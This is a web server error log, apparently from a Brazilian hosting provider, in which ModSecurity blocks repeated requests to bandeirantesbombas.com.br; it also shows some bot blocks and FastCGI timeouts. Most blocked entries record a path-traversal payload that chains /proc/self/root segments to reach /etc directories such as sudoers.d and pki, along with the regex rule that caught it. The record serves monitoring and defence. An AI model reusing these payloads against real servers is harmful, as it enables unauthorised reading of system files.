[Tue Mar 17 15:53:12.446025 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.241.31:42566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjGKt8Nd0UC_OcbVHU4wAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:53:19.908287 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.241.31:42566] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjH6t8Nd0UC_OcbVHU6gAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:53:29.153804 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:53:30.166707 2026] [:error] [pid 9299:tid 140411683178240] [client 74.7.244.43:37748] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmjKr-sgTmmJoPuMdzBcwAAAsc"]
[Tue Mar 17 15:53:43.211055 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.243.128:43176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjN7-sgTmmJoPuMdzBfwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:53:51.129781 2026] [proxy_fcgi:error] [pid 2598:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:53:58.410479 2026] [:error] [pid 29151:tid 140411599251200] [client 74.7.243.128:34072] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjRvPqhzTj3BvfDX-TVwAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:54:01.884300 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.241.31:52950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjScU6Sx0TG1YjmQi6swAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:54:03.135632 2026] [:error] [pid 9299:tid 140411666392832] [client 74.7.243.128:38418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjS7-sgTmmJoPuMdzBiwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:54:19.078685 2026] [proxy_fcgi:error] [pid 17965:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:54:21.152656 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.228.61:59576] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmjXaBJNF7axNlVR0UjvwAAABU"]
[Tue Mar 17 15:54:27.336034 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:51882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjY7-sgTmmJoPuMdzBtAAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:54:41.081896 2026] [proxy_fcgi:error] [pid 18380:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41112] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:54:49.107590 2026] [:error] [pid 2598:tid 140411691570944] [client 74.7.241.31:42272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjeRj0p0SRWAqcjGGEqQAAAwY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:55:00.255034 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:39498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjhKBJNF7axNlVR0Uj1wAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:55:03.157443 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:55:07.707177 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.241.31:52962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjixj0p0SRWAqcjGGEwQAAAwM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:55:25.125799 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42278] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:55:26.229052 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.241.31:33496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjnq4xEDsg_V3ESNZXiwAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:55:47.169784 2026] [proxy_fcgi:error] [pid 17965:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42872] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:55:49.764441 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.241.31:42026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjtfPqhzTj3BvfDX-TmgAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 15:55:51.505569 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.241.31:48520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmjt6t8Nd0UC_OcbVHVKQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:56:09.141866 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:43422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:56:27.067753 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.241.31:48532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmj2xj0p0SRWAqcjGGE8AAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 15:56:31.145787 2026] [proxy_fcgi:error] [pid 6296:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:56:38.593012 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.241.31:41058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmj5qt8Nd0UC_OcbVHVRwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:56:53.125816 2026] [proxy_fcgi:error] [pid 29151:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:44654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:57:15.127090 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45180] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:57:17.015421 2026] [:error] [pid 6296:tid 140411658000128] [client 74.7.241.31:46856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkDXIk7brgkOH-rIWXUQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:57:20.211140 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:35280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkEKBJNF7axNlVR0UkIgAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 15:57:37.127879 2026] [proxy_fcgi:error] [pid 18380:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45640] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:57:38.959914 2026] [:error] [pid 25581:tid 140411624429312] [client 74.7.241.31:35290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmkIhLxOFNDSaSvJXBW_gAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 15:57:59.140479 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:58:21.125796 2026] [proxy_fcgi:error] [pid 7437:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:58:42.145825 2026] [proxy_fcgi:error] [pid 17965:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 15:58:49.266311 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.244.43:49438] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmkafPqhzTj3BvfDX-T7AAAAcQ"]
[Tue Mar 17 15:59:04.142796 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47962] AH01075: Error dispatching request to : (polling)
